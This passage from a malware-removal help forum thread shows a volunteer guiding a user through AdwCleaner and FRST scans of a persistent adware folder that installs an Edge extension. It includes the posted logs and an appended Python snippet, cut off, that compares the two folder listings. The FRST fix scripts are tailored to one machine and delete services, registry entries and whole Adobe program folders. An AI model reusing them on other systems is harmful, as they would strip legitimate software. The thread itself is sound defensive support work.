(05/07/2021 10:57:23 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Update Orchestrator Service service hung on starting.   
Error: (05/07/2021 10:53:44 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Downloaded Maps Manager service hung on starting.   Error: (05/07/2021 10:51:31 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Delivery Optimization service hung on starting.   Error: (05/07/2021 10:49:17 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Windows Presentation Foundation Font Cache 3.0.0.0 service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.   Error: (05/07/2021 10:49:17 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Presentation Foundation Font Cache 3.0.0.0 service to connect.   Error: (05/07/2021 10:48:38 AM) (Source: Service Control Manager) (EventID: 7016) (User: ) Description: The Conexant SmartAudio service service has reported an invalid current state 14.   Error: (05/07/2021 10:46:08 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY) Description: There was an error while attempting to read the local hosts file.   Error: (05/07/2021 10:45:33 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (45000 milliseconds) while waiting for the Dolby DAX2 API Service service to connect.     Windows Defender: ================ Date: 2021-04-28 09:47:58 Description:  Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan   Date: 2021-04-25 11:06:26 Description:  Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Custom Scan   Date: 2021-04-24 13:21:56 Description:  Microsoft Defender Antivirus scan has been stopped before completion. 
Scan Type: Antimalware Scan Parameters: Quick Scan   Date: 2021-04-23 11:40:41 Description:  Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Full Scan   Date: 2021-04-23 11:30:45 Description:  Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan   Date: 2021-05-06 08:48:28 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Update Server Security intelligence Type: AntiVirus Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80070102 Error description: The wait operation timed out.    Date: 2021-05-06 08:48:28 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Update Server Security intelligence Type: AntiVirus Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80070102 Error description: The wait operation timed out.    Date: 2021-04-28 10:07:42 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiVirus Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out    Date: 2021-04-28 10:07:42 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. 
New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiSpyware Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out    Date: 2021-04-28 10:07:42 Description:  Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version:  Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiVirus Update Type: Full Current Engine Version:  Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out    CodeIntegrity: =============== Date: 2021-05-07 11:14:06 Description:  Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.   Date: 2021-05-07 11:04:02 Description:  Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt_x86.dll that did not meet the Microsoft signing level requirements.   Date: 2021-05-07 10:58:58 Description:  Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Microsoft signing level requirements.     
==================== Memory info ===========================

BIOS: LENOVO 3JCN31WW 07/17/2018
Motherboard: LENOVO Torronto 4C2
Processor: Intel® Core™ i5-7200U CPU @ 2.50GHz
Percentage of memory in use: 62%
Total physical RAM: 6044.22 MB
Available physical RAM: 2248.29 MB
Total Virtual: 8860.22 MB
Available Virtual: 5297.87 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:890.12 GB) (Free:189.39 GB) NTFS
Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:16.12 GB) NTFS

\\?\Volume{7b078799-1b7a-482a-b117-b30df98f6356}\ (WINRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.48 GB) NTFS
\\?\Volume{e8a927c2-8256-4564-bc60-9955bd9de628}\ (LENOVO_PART) (Fixed) (Total:14.17 GB) (Free:1.55 GB) NTFS
\\?\Volume{3d83052a-24c6-47f1-b841-9e158ac65522}\ (SYSTEM_DRV) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: E59E8286)

Partition: GPT.

==================== End of Addition.txt =======================

#8 Oh My!

Oh My!

    Adware and Spyware and Malware

  • Malware Response Instructor

Posted 07 May 2021 - 08:18 AM

Thank you.

Let's start cleaning up your computer.

You do not have a default browser specified. Can you tell me if Edge is what you normally use?

I am going to have you run AdwCleaner, partly because it will identify pre-installed Lenovo software you may or may not want to use/keep. You can leave it all if you wish or delete those things you don't use.

Please consider and do this.

===================================================
Peer to Peer (P2P) Warning
--------------------
Going over your logs I noticed that you have Peer 2 Peer (torrent) program(s) installed. It is pretty much certain that if you continue to use P2P programs, you will get infected again.
  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a smörgåsbord of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
I would recommend that you uninstall Peer 2 Peer programs, however that choice is up to you. If you choose to remove the program, you can do so via Start > Control Panel > Add/Remove Programs.

If you are still leaning toward using this program, please take a look at this information about CryptoLocker Ransomware, a type of Ransomware which can be delivered via P2P file transfers. The newest variation of Ransomware can make it impossible to recover the files this malicious software encrypts. In other words, you will probably lose most if not all of your valuable information, including pictures. In addition it has recently been reported that P2P downloads may be tracked resulting in your IP address being monitored by copyright authorities.

If you wish to keep it, please do not use it until we are completely done and your machine is determined to be clean and updated.

===================================================
Malwarebytes AdwCleaner
-------------------
  • Please download AdwCleaner and save it to your Desktop
  • Close all open programs and browsers
  • Click I agree
  • Click Scan now
  • Allow the program to remove what it finds except for Pre-installed applications if you would like to keep those or other entries you would like to keep
  • When completed click View Scan Log File
  • Copy and paste the contents in your reply
===================================================
Farbar Recovery Scan Tool Fix
--------------------
  • Right click on the FRST icon and select Run as administrator
  • Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied
  • There is no need to paste the information anywhere, FRST will do it for you
Start::
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412680 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-07-30] (Adobe Inc. -> )
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3780296 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3548360 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated)
C:\Program Files (x86)\Adobe
C:\Program Files (x86)\Common Files\Adobe
C:\Program Files\Adobe
2021-05-02 15:51 - 2021-05-02 15:51 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen]
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\RunOnce: [DependencyCheck] => Performed
Task: {82F7335F-144E-45F8-8E0A-FB23AA76AC60} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-04-30] (Avast Software s.r.o. -> Avast Software)
Task: {B142D6B6-D6C6-4804-9BA9-92A856ADF9F3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.)
HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSKHKLM => not found
2021-04-27 09:00 - 2021-04-27 09:00 - 000003304 _____ C:\WINDOWS\system32\.tmp
2021-04-10 17:19 - 2021-02-26 18:05 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft]
C:\Program Files\Common Files\Avast Software\Overseer
Folder: C:\ProgramData\Key-Base
Folder: C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782}
Folder: C:\ProgramData\Kawmq
C:\ProgramData\Kawmq
hosts:
End::
  • Click Fix
  • When completed the tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================
Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Default browser?
  • AdwCleaner log
  • Fixlog
  • Update on computer performance
Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God.
John 6:68-69
The Man on the Middle Cross Said I Could Come

#9 Jones2021Riano

Jones2021Riano
  • Topic Starter

Posted 08 May 2021 - 01:22 AM

AdwCleaner log:

 

# -------------------------------
# Malwarebytes AdwCleaner 8.2.0.0
# -------------------------------
# Build:    03-22-2021
# Database: 2021-04-28.3 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    05-08-2021
# Duration: 00:00:29
# OS:       Windows 10 Home Single Language
# Cleaned:  1
# Failed:   0

***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

Deleted       C:\Users\Public\Desktop\Web Navigation.lnk

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.

*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [2619 octets] - [08/05/2021 13:46:38]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Fixlog:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 28-04-2021
Ran by FRANCIS (08-05-2021 14:00:16) Run:1
Running from C:\Users\FRANCIS\Downloads
Loaded Profiles: FRANCIS & PC Gamer Jones
Boot Mode: Normal
==============================================

fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412680 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-07-30] (Adobe Inc. -> )
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3780296 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3548360 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated)
C:\Program Files (x86)\Adobe
C:\Program Files (x86)\Common Files\Adobe
C:\Program Files\Adobe
2021-05-02 15:51 - 2021-05-02 15:51 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen]
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\RunOnce: [DependencyCheck] => Performed
Task: {82F7335F-144E-45F8-8E0A-FB23AA76AC60} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-04-30] (Avast Software s.r.o. -> Avast Software)
Task: {B142D6B6-D6C6-4804-9BA9-92A856ADF9F3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.)
HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSKHKLM => not found
2021-04-27 09:00 - 2021-04-27 09:00 - 000003304 _____ C:\WINDOWS\system32\.tmp
2021-04-10 17:19 - 2021-02-26 18:05 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft]
C:\Program Files\Common Files\Avast Software\Overseer
Folder: C:\ProgramData\Key-Base
Folder: C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782}
Folder: C:\ProgramData\Kawmq
C:\ProgramData\Kawmq
hosts:

*****************

Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeGCInvoker-1.0" => removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeAAMUpdater-1.0" => removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Adobe CCXProcess" => removed successfully
HKLM\System\CurrentControlSet\Services\AdobeARMservice => removed successfully
AdobeARMservice => service removed successfully
HKLM\System\CurrentControlSet\Services\AGMService => removed successfully
AGMService => service removed successfully
HKLM\System\CurrentControlSet\Services\AGSService => removed successfully
AGSService => service removed successfully
C:\Program Files (x86)\Adobe => moved successfully
C:\Program Files (x86)\Common Files\Adobe => moved successfully
C:\Program Files\Adobe => moved successfully
C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen] => moved successfully
"HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => not found
"HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => removed successfully
"HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Software\Microsoft\Windows\CurrentVersion\RunOnce\\DependencyCheck" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{82F7335F-144E-45F8-8E0A-FB23AA76AC60}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82F7335F-144E-45F8-8E0A-FB23AA76AC60}" => removed successfully
C:\WINDOWS\System32\Tasks\Avast Software\Overseer => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Avast Software\Overseer" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B142D6B6-D6C6-4804-9BA9-92A856ADF9F3}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B142D6B6-D6C6-4804-9BA9-92A856ADF9F3}" => removed successfully
C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Acrobat Update Task" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\AdobeGCInvoker-1.0" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\AdobeGCInvoker-1.0" => not found
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\AdobeAAMUpdater-1.0" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\AdobeAAMUpdater-1.0" => not found
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => removed successfully
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\BookReader_B171F20233094AC88D05A8EF7B9763E8 => removed successfully
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => removed successfully
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => removed successfully
"HKLM\Software\Mozilla\Thunderbird\Extensions\\[email protected]" => removed successfully
C:\WINDOWS\system32\.tmp => moved successfully
C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft] => moved successfully
C:\Program Files\Common Files\Avast Software\Overseer => moved successfully

========================= Folder: C:\ProgramData\Key-Base ========================

2021-04-23 21:24 - 2021-04-23 21:24 - 000000000 RASHD [00000000000000000000000000000000] () C:\ProgramData\Key-Base\27b48b2c.052
2021-04-23 21:24 - 2021-04-23 21:24 - 000000512 _RASH [B6F10E213EA8FF8C40076D93FEA6DCD3] () C:\ProgramData\Key-Base\27b48b2c.052\CODE.PK_
2021-04-23 21:24 - 2021-04-23 21:24 - 000000512 _RASH [B6F10E213EA8FF8C40076D93FEA6DCD3] () C:\ProgramData\Key-Base\27b48b2c.052\CODE.PKD

====== End of Folder: ======

========================= Folder: C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782} ========================

====== End of Folder: ======

========================= Folder: C:\ProgramData\Kawmq ========================

2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Hewd
2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Hewd\DC05DC4E
2021-05-06 14:48 - 2021-05-06 14:48 - 000072490 ___AH [EB52845F05D64809A2957776108265F4] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\background.js
2021-05-06 14:48 - 2021-05-06 14:48 - 000000440 ___AH [86DF701CE3B2191A415BDEF3222AB59F] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\icon128.png
2021-05-06 14:48 - 2021-05-06 14:48 - 000000399 ___AH [75655D0D7A4F332CE5ACCF2B0375EEC6] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\manifest.json
2021-05-06 14:48 - 2021-05-06 14:48 - 000000100 ___AH [D39131B1B8DC37DA0B47C8B887528E1E] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\zciw

====== End of Folder: ======

C:\ProgramData\Kawmq => moved successfully
Hosts restored successfully.

The system needed a reboot.

==== End of Fixlog 14:04:04 ====

#10 Jones2021Riano

Jones2021Riano
  • Topic Starter

Posted 08 May 2021 - 01:27 AM

Default Browser: Microsoft Edge

 

Performance: Still the same when I uninstalled P2P

 

Other Concern: C:\ProgramData\Kawmq still appears after reboots, creates an extension called vHome News when Microsoft Edge is opened, and causes a Bing search to pop up.

Attached Files

  • Attached File 2021-05-08.png 224.13KB 0 downloads

Edited by Jones2021Riano, 08 May 2021 - 01:28 AM.


#11 Oh My!

Oh My!

    Adware and Spyware and Malware

  • Malware Response Instructor

Posted 08 May 2021 - 08:22 AM

OK please do this. I would like to look at the files inside the folder again in case they changed names.

===================================================
Farbar Recovery Scan Tool Fix
--------------------
  • Right click on the FRST icon and select Run as administrator
  • Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied
  • There is no need to paste the information anywhere, FRST will do it for you
Start:: Folder: C:\ProgramData\Kawmq End::
  • Click Fix
  • When completed he tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God. John 6:68-69
The Man on the Middle Cross Said I Could Come

#12 Jones2021Riano


Posted 08 May 2021 - 08:30 AM

Fix result of Farbar Recovery Scan Tool (x64) Version: 08-05-2021
Ran by FRANCIS (08-05-2021 21:29:34) Run:2
Running from C:\Users\FRANCIS\Downloads
Loaded Profiles: FRANCIS
Boot Mode: Normal
==============================================

fixlist content:
*****************
Folder: C:\ProgramData\Kawmq

*****************

========================= Folder: C:\ProgramData\Kawmq ========================

2021-05-08 14:11 - 2021-05-08 14:11 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Rpdnepq
2021-05-08 14:11 - 2021-05-08 14:11 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E
2021-05-08 14:11 - 2021-05-08 14:11 - 000072490 ___AH [EB52845F05D64809A2957776108265F4] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\background.js
2021-05-08 14:11 - 2021-05-08 14:11 - 000000440 ___AH [86DF701CE3B2191A415BDEF3222AB59F] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\icon128.png
2021-05-08 14:11 - 2021-05-08 14:11 - 000000399 ___AH [75655D0D7A4F332CE5ACCF2B0375EEC6] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\manifest.json
2021-05-08 14:11 - 2021-05-08 14:11 - 000000100 ___AH [D39131B1B8DC37DA0B47C8B887528E1E] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\zciw

====== End of Folder: ======

==== End of Fixlog 21:29:34 ====
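An added example (not written by anyone in this thread, and not part of FRST): a small parser for the `Folder:` listing lines in the two Fixlogs above, comparing the 6 May and 8 May runs by MD5, size and file name instead of by path. The field layout and the reading of the attribute letters (H as hidden, D as directory) are assumptions inferred from the lines posted here.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Listing lines copied from the two Fixlogs posted in this thread.
RUN_MAY_06 = r"""
2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Hewd
2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Hewd\DC05DC4E
2021-05-06 14:48 - 2021-05-06 14:48 - 000072490 ___AH [EB52845F05D64809A2957776108265F4] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\background.js
2021-05-06 14:48 - 2021-05-06 14:48 - 000000440 ___AH [86DF701CE3B2191A415BDEF3222AB59F] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\icon128.png
2021-05-06 14:48 - 2021-05-06 14:48 - 000000399 ___AH [75655D0D7A4F332CE5ACCF2B0375EEC6] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\manifest.json
2021-05-06 14:48 - 2021-05-06 14:48 - 000000100 ___AH [D39131B1B8DC37DA0B47C8B887528E1E] () C:\ProgramData\Kawmq\Hewd\DC05DC4E\zciw
"""
RUN_MAY_08 = r"""
2021-05-08 14:11 - 2021-05-08 14:11 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Rpdnepq
2021-05-08 14:11 - 2021-05-08 14:11 - 000000000 ___HD [00000000000000000000000000000000] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E
2021-05-08 14:11 - 2021-05-08 14:11 - 000072490 ___AH [EB52845F05D64809A2957776108265F4] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\background.js
2021-05-08 14:11 - 2021-05-08 14:11 - 000000440 ___AH [86DF701CE3B2191A415BDEF3222AB59F] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\icon128.png
2021-05-08 14:11 - 2021-05-08 14:11 - 000000399 ___AH [75655D0D7A4F332CE5ACCF2B0375EEC6] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\manifest.json
2021-05-08 14:11 - 2021-05-08 14:11 - 000000100 ___AH [D39131B1B8DC37DA0B47C8B887528E1E] () C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\zciw
"""

# Assumed layout: <timestamp> - <timestamp> - <size> <attrs> [<MD5>] (<company>) <path>
LINE_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - (\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(\d+) ([A-Z_]+) \[([0-9A-F]{32})\] \((.*?)\) (.+)$"
)


@dataclass
class Entry:
    first_ts: str
    second_ts: str
    size: int
    attrs: str
    md5: str
    path: PureWindowsPath

    @property
    def is_dir(self):
        return "D" in self.attrs  # assumption: D marks a directory

    @property
    def hidden(self):
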